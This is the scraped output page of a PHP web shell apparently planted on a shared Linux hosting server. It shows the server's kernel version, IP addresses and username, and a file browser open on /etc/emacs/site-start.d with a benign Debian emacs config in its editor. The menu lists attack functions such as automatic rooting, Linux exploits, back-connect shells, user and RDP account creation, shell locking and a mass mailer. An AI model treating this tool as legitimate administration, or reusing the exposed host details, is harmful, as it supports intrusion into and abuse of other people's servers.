Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
emacs /
site-start.d /
[ HOME SHELL ]
Name
Size
Permission
Action
00debian.el
584
B
-rw-r--r--
50autoconf.el
729
B
-rw-r--r--
50dictionaries-common.el
1.81
KB
-rw-r--r--
50psvn.el
101
B
-rw-r--r--
50tcsh.el
1.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 00debian.el
;; Set the default mail server and news server as specified by Debian ;; policy. (setq gnus-nntpserver-file "/etc/news/server") (setq mail-host-address (let ((name (expand-file-name "/etc/mailname"))) (if (not (file-readable-p name)) nil (with-temp-buffer (insert-file-contents-literally name) (while (search-forward "\n" nil t) (replace-match "" nil t)) (buffer-string)))))
Close